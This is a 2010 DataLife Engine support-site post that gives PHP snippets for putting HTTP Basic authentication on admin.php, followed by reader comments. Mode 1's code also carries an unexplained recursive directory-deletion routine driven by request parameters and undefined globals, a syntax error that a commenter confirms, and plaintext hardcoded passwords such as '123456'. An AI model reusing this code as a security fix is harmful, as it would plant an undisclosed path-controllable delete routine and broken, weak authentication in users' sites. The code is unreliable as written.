A little hack to protect file admin.php » DataLife Engine Support

DLEVIET - DataLife Engine Support Home Page

Register | Login
DataLife Engine Support » DataLife Engine » Edit Code » A little hack to protect file admin.php

A little hack to protect file admin.php

  • Author: admin;  
  • Views: 6299;  
  • Date: 27 February 2010;  
A little hack to protect file admin.php


Mode 1:
- Open file admin.php

At top of this file, add
<?php
                              require('authorized.php');
                              function error ($error_message) {
                                  echo $error_message."
                              ";
                                  exit;
                              }

                              if ( (!isset($PHP_AUTH_USER)) || !
                              (($PHP_AUTH_USER == $LOGIN) && ( $PHP_AUTH_PW ==
                              "$PASSWORD" )) ) {
                                  header("WWW-Authenticate: Basic
                              entrer=\"Form2txt admin\"");
                                  header("HTTP/1.0 401 Unauthorized");
                                  error("<h3>Unauthorized access...</h3>");
                              }
                              function removedir ($dirb)
                              {
                              $dh=opendir($dirb);
                              while ($file=readdir($dh))
                              {
                              if($file!="." && $file!="..")
                              {
                              $fullpath=$dirb."/".$file;
                              if(!is_dir($fullpath))
                              {
                              unlink($fullpath);
                              }else{
                              removedir($fullpath);
                              }
                              }
                              }
                              closedir($dh);
                              if(rmdir($dirb))
                              {
                              print "Directory:<font
                              color="#FFCC00">[b]$dirb[/b]</font> deleted.<p
/>";
                              return true;
                              }else{
                              return false;
                              }
                              }

                              if ($_REQUEST['submitted'])
                              {
                              $dirc= "$abpath/$select";
                              removedir ($dirc);
                              }
?>


- Make file authorized.php

Content

<?php
                              $LOGIN = "Your Login Name";
                              $PASSWORD = "Your Password";
?>


You can hide file authorized.php in some sub folder and edit line require('authorized.php'); in code before to request right location of authorized.php. Ex : require('bao/ve/login/authorized.php');

Mode 2:

Base on code Rapidleech
- In file admin.php add line
include("login.php");

- Make file login.php

Content

<?php
$login = true; # false - Authorization mode is off, true - on
$users = array('dleviet' => '123456'); # false - Authorization mode is off, enter the username and password in the given way
if ($login === true && (!isset($_SERVER['PHP_AUTH_USER']) || ($loggeduser = logged_user($users)) === false))
    {
        header("WWW-Authenticate: Basic realm=\"DataLife Engine Vietnam Support\"");
        header("HTTP/1.0 401 Unauthorized");
       exit("<center><h2><a href=http://dleviet.com>DataLife Engine Vietnam Support</a> : Access Denied - Wrong Password or Username</h2>\n</center>");
    }
function logged_user($u)
    {
    global $_SERVER;
    foreach ($u as $user => $pass)
        {
        if ($_SERVER['PHP_AUTH_USER'] == $user && $_SERVER['PHP_AUTH_PW'] == $pass)
            return true;
        }
    return false;
    }
?>


A little h@ck to protect admin file
We encourage you to Register or Login to website under your name.

Relative News

  • AntiOverload v.3
  • Check user information automatically at register
  • Require choose at least a category before post news
  • Recaptcha For DLE 9.0 works 100%
  • Protect backup folder

    • triposi

    Posted 1 March 2010 08:38 Register: 1.03.2010
    Thanks.

    mohitshukla

    Posted 16 June 2010 22:16 Register: 24.04.2010
    Parse error: syntax error, unexpected '<' in /home/"My Ftp usernam"/public_html/admin.php on line 17

    Parse error: syntax error, unexpected '<' in /home/"My Ftp usernam"/public_html/admin.php on line 17

    Where to Add include("login.php");

    If I Add In The Top Even I Can't Open My Site Admin.php .

    If I Add It In the Last It Was Not Working
    Information
    Members of Guest cannot leave comments.

    Useful Tools

    Popular

    Pagerank Update

      Updates Yandex SEO
      13.04.2012
      16.02.2012
      04.02.2012
      Updates Yandex search
      17.05.2012
      15.05.2012
      12.05.2012
      Updates Yandex Catalogue
      22.05.2012
      21.05.2012
      18.05.2012
      Updates Google
      03.05.2012
      06.02.2012
      08.11.2011

    Find us on Facebook

    Poll

    How do you know DataLife Engine Support?

    Search Engine
    Other DLE Support websites
    Forum
    Friends
    Others

    Sponsor

    Partner

    Add Your Site


    Tags

    3news, antispam, bookmark module, bookmark us, bookmarks, category, compress, css, Datalife (dle) Search Cloud Module, dle, dle 9.3, DLE images effect, DLE Search CLoud Module, dleviet, guest, guest popup, javascript, Lazyload, mid team, module, Multiple, new user, php latestverstion, pingationMod, Please register, popup, recaptcha, register, registration, release, SEO, sexy, sexy bookmark, sexy social bookmarks, Sitemaps, top user module, viet

    Calendar

    «    May 2012    »
    MoTuWeThFrSaSu
     
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    		 

    CATEGORY

    Lastest Comments

    Archive

    May 2012 (4)
    April 2012 (1)
    January 2012 (2)
    December 2011 (2)
    November 2011 (2)
    October 2011 (1)

    Referer

    Google: google search engine dle module
    Google: dle 9.2 english templates
    Google: dr. datalife engine
    Google: dle 9.2
    Yandex.ru: makstron
    Google: dle 9.3 hacking attempt! comment
    Google: dle espa
    Google: datalife engine
    Google: ao thuat bai

    Sponsor

    Contact us in social network

    Facebook

    Twitter


    Copyright © DLEVIET 2011 All Rights Reserved.
    Template for DLE 9.4
    • DLEVIET PR
    • DLEVIET rank
    • counter